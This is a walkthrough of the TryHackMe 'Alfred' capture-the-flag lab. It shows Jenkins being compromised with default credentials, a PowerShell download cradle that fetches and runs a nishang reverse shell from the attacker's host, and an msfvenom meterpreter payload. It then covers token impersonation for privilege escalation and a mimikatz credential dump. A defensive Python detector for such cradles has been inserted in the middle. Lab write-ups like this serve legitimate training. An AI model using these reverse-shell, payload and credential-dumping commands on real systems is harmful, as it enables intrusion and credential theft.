TryHackMe Alfred Walkthrough

Exploited Jenkins to gain an initial shell, then escalated privileges by exploiting Windows authentication tokens. Meterpreter was deployed with web_delivery.


Legal Usage: The information provided by executeatwill is to be used for educational purposes only. The website creator and/or editor is in no way responsible for any misuse of the information provided. All the information on this website is meant to help the reader develop penetration testing and vulnerability aptitude to prevent attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. Information provided by this website is to be regarded from an “ethical hacker” standpoint. Only perform testing on systems you OWN and/or have express written permission to test. Use information at your own risk. By continued reading, you acknowledge the aforementioned user risks/responsibilities.


Recon

Target: 10.10.230.14

Nmap scan:

nmap -sV -sC -oA nmap/alfred 10.10.230.14 -Pn

Nmap all ports:

nmap -p- -oA nmap/alfred_allports 10.10.230.14 -Pn

Open Port Review:

Port 80 - Microsoft IIS httpd 7.5 - webserver

image bruce.jpg and email exposed [email protected].

Port 3389 - Remote RDP

Port 8080 - Jetty 9.4.z-SNAPSHOT - webserver

A login attempt with admin:admin gives access to the backend.

version number exposed as Jenkins ver. 2.190.1

Jenkins searchsploit:

accessing console

discovered console:

http://10.10.230.14:8080/job/project/1/console

Under the “Build” section of /job/project/configure, the “whoami” command field offers the ability to execute commands on the target system.

Reverse Shell

using nishang PowerShellTcp.ps1 to create a reverse shell:

Github Link: https://github.com/samratashok/nishang.git

creating webserver on local machine via python3

python3 -m http.server

adding powershell command to console “Build” section:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.20.45:8000/PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.20.45 -Port 9000

Listener setup: rlwrap allows for (up, down, left, right keyboard commands)

rlwrap nc -lvnp 9000

Connection received:

Systeminfo

User.txt located: C:\Users\bruce\desktop\user.txt
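
From the defender's side, the build-step command above appears in process-creation telemetry as powershell.exe descended from the Jenkins java.exe process. The following is an added example, not part of the original walkthrough: a Python check over constructed Sysmon Event ID 1 style records (paths, PIDs and the 192.0.2.10 URL are made up) that flags download-cradle command lines with Jenkins in their ancestry.

```python
import re

# Constructed sample events using Sysmon Event ID 1 (process creation) field names.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"ProcessId": 1200, "ParentProcessId": 600, "CommandLine": "java.exe -jar jenkins.war",
     "Image": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe"},
    {"ProcessId": 2300, "ParentProcessId": 1200, "Image": CMD,
     "CommandLine": r"cmd.exe /c call C:\Windows\TEMP\jenkins1.bat"},
    {"ProcessId": 2310, "ParentProcessId": 2300, "CommandLine": "whoami",
     "Image": r"C:\Windows\System32\whoami.exe"},
    {"ProcessId": 2400, "ParentProcessId": 1200, "Image": CMD,
     "CommandLine": r"cmd.exe /c call C:\Windows\TEMP\jenkins2.bat"},
    {"ProcessId": 2410, "ParentProcessId": 2400, "Image": PS, "CommandLine":
     "powershell iex (New-Object Net.WebClient).DownloadString('http://192.0.2.10:8000/a.ps1')"},
    {"ProcessId": 3000, "ParentProcessId": 900, "Image": PS,
     "CommandLine": "powershell Get-Service"},
]

# Strings typical of a PowerShell download cradle like the one in the build step.
CRADLE = re.compile(
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|invoke-expression|\biex\b",
    re.IGNORECASE)

def is_jenkins(ev):
    """True for the Java process that hosts Jenkins."""
    text = (ev["Image"] + " " + ev["CommandLine"]).lower()
    return ev["Image"].lower().endswith("java.exe") and "jenkins" in text

def ancestors(ev, by_pid):
    """Yield parent, grandparent, ... of ev; stop on an unknown parent or a PID loop."""
    seen = set()
    while ev["ParentProcessId"] in by_pid and ev["ParentProcessId"] not in seen:
        seen.add(ev["ParentProcessId"])
        ev = by_pid[ev["ParentProcessId"]]
        yield ev

def detect(events):
    """Return processes descended from Jenkins whose command line has a cradle."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for ev in events:
        chain = list(ancestors(ev, by_pid))
        if CRADLE.search(ev["CommandLine"]) and any(is_jenkins(a) for a in chain):
            alerts.append({"pid": ev["ProcessId"], "command": ev["CommandLine"],
                           "chain": [a["Image"].rsplit("\\", 1)[-1] for a in chain]})
    return alerts

if __name__ == "__main__":
    print(detect(EVENTS))
```

Walking the full ancestry matters because the build step runs through an intermediate cmd.exe, so a rule that only compares the direct parent to java.exe would miss it. Over long log windows, key the lookup on a process GUID rather than the PID, since PIDs are reused.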

Upgrading shell to meterpreter shell

create payload with msfvenom

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai EXITFUNC=thread LHOST=10.8.20.45 LPORT=9001 -f exe -o revshell9001exit.exe

Setup multi/handler

Download revshell to target

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.20.45:8000/revshell9001.exe','revshell9001.exe')"

Start process with:

Start-Process "revshell9001.exe"

(In my case, meterpreter would hang and never fully connect to the handler. Moved to creating a meterpreter session with web_delivery.)

Creating Meterpreter shell via web_delivery

took the generated code and executed on target:

Migrate to higher process

ps
migrate

elevated:

Windows User Impersonation

investigate privileges of bruce:

whoami /priv

From this output, the following privileges can be exploited because they are enabled:

SeDebugPrivilege
SeImpersonatePrivilege 

Load Incognito + List tokens within meterpreter

load incognito
list_tokens -g

Impersonate token

impersonate_token "BUILTIN\Administrators"

root.txt

located at C:\Windows\System32\config

Post Exploitation

mimikatz extract

load kiwi
get_creds